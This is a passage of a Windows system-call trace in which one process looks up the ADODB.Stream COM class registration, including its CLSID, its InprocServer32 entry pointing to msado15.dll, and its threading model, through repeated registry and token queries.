 02393   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\ADODB.Stream\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02394   456   NtOpenKey  (0x1, {24, 346, 0x40, 0, 0,  (0x1, {24, 346, 0x40, 0, 0, "CLSID"}, ... 348, ) }, ... 348, ) == 0x0
 02395   456   NtQueryKey  (350, Name, 392, ... {Name= (350, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\ADODB.Stream\CLSID3"}, 110, ) }, 110, ) == 0x0
 02396   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02397   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02398   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02399   456   NtClose  (352, ... ) == 0x0
 02400   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\ADODB.Stream\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02401   456   NtQueryValueKey  (350, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (350, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="{\00\00\00\00\00\05\06\06\0-\00\00\00\00\0-\00\00\01\00\0-\08\00\00\00\0-\00\00\0A\0A\00\00\06\0D\02\0E\0A\04\0}\0\0\0"}, 90, ) }, 90, ) == 0x0
 02402   456   NtClose  (350, ... ) == 0x0
 02403   456   NtClose  (346, ... ) == 0x0
 02404   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02405   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 344, ) }, ... 344, ) == 0x0
 02406   456   NtQueryValueKey  (344,  (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02407   456   NtClose  (344, ... ) == 0x0
 02408   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02409   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 344, ) }, ... 344, ) == 0x0
 02410   456   NtQueryValueKey  (344,  (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02411   456   NtClose  (344, ... ) == 0x0
 02412   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02413   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02414   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02415   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02416   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02417   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02418   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02419   456   NtClose  (348, ... ) == 0x0
 02420   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02421   456   NtOpenKey  (0x1, {24, 346, 0x40, 0, 0,  (0x1, {24, 346, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02422   456   NtClose  (346, ... ) == 0x0
 02423   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02424   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 344, ) }, ... 344, ) == 0x0
 02425   456   NtQueryValueKey  (344,  (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02426   456   NtClose  (344, ... ) == 0x0
 02427   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02428   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 344, ) }, ... 344, ) == 0x0
 02429   456   NtQueryValueKey  (344,  (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02430   456   NtClose  (344, ... ) == 0x0
 02431   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02432   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02433   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02434   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02435   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02436   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02437   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02438   456   NtClose  (348, ... ) == 0x0
 02439   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02440   456   NtOpenKey  (0x1, {24, 346, 0x40, 0, 0,  (0x1, {24, 346, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02441   456   NtClose  (346, ... ) == 0x0
 02442   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02443   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02444   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02445   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02446   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02447   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02448   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02449   456   NtClose  (348, ... ) == 0x0
 02450   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02451   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocServer32"}, ... 348, ) }, ... 348, ) == 0x0
 02452   456   NtQueryKey  (350, Name, 392, ... {Name= (350, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 02453   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02454   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02455   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02456   456   NtClose  (352, ... ) == 0x0
 02457   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02458   456   NtQueryValueKey  (350,  (350, "InprocServer32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02459   456   NtClose  (350, ... ) == 0x0
 02460   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02461   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02462   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02463   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02464   456   NtClose  (348, ... ) == 0x0
 02465   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02466   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02467   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02468   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02469   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02470   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02471   456   NtClose  (348, ... ) == 0x0
 02472   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02473   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02474   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02475   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02476   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02477   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02478   456   NtClose  (348, ... ) == 0x0
 02479   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02480   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocServer32"}, ... 348, ) }, ... 348, ) == 0x0
 02481   456   NtQueryKey  (350, Name, 392, ... {Name= (350, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 02482   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02483   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02484   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02485   456   NtClose  (352, ... ) == 0x0
 02486   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02487   456   NtQueryValueKey  (350, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (350, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\\0S\0y\0s\0t\0e\0m\0\\0a\0d\0o\0\\0m\0s\0a\0d\0o\01\05\0.\0d\0l\0l\0\0\0"}, 118, ) }, 118, ) == 0x0
 02488   456   NtClose  (350, ... ) == 0x0
 02489   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02490   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02491   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02492   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02493   456   NtClose  (348, ... ) == 0x0
 02494   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02495   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02496   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02497   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02498   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02499   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02500   456   NtClose  (348, ... ) == 0x0
 02501   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02502   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02503   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02504   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02505   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02506   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02507   456   NtClose  (348, ... ) == 0x0
 02508   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02509   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02510   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}_"}, 162, ) }, 162, ) == 0x0
 02511   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02512   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02513   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02514   456   NtClose  (348, ... ) == 0x0
 02515   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02516   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02517   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02518   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02519   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 348, ) }, ... 348, ) == 0x0
 02520   456   NtQueryKey  (350, Name, 392, ... {Name= (350, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02521   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02522   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02523   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02524   456   NtClose  (352, ... ) == 0x0
 02525   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02526   456   NtQueryValueKey  (350,  (350, "AppID", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02527   456   NtClose  (350, ... ) == 0x0
 02528   456   NtClose  (346, ... ) == 0x0
 02529   456   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {452, 0}, ... 344, ) == 0x0
 02530   456   NtQueryInformationProcess  (344, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 02531   456   NtClose  (344, ... ) == 0x0
 02532   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02533   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02534   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02535   456   NtClose  (346, ... ) == 0x0
 02536   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES5"}, 138, ) }, 138, ) == 0x0
 02537   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02538   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02539   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02540   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02541   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02542   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02543   456   NtClose  (348, ... ) == 0x0
 02544   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02545   456   NtOpenKey  (0x2000000, {24, 346, 0x40, 0, 0,  (0x2000000, {24, 346, 0x40, 0, 0, "InprocServer32"}, ... 348, ) }, ... 348, ) == 0x0
 02546   456   NtQueryKey  (350, Name, 392, ... {Name= (350, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 02547   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02548   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02549   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02550   456   NtClose  (352, ... ) == 0x0
 02551   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02552   456   NtQueryValueKey  (350,  (350, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (350, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) }, 32, ) == 0x0
 02553   456   NtClose  (350, ... ) == 0x0
 02554   456   NtClose  (346, ... ) == 0x0
 02555   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02556   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02557   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}"}, ... 344, ) }, ... 344, ) == 0x0
 02558   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}0"}, 162, ) }, 162, ) == 0x0
 02559   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02560   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02561   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02562   456   NtClose  (348, ... ) == 0x0
 02563   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02564   456   NtOpenKey  (0x1, {24, 346, 0x40, 0, 0,  (0x1, {24, 346, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
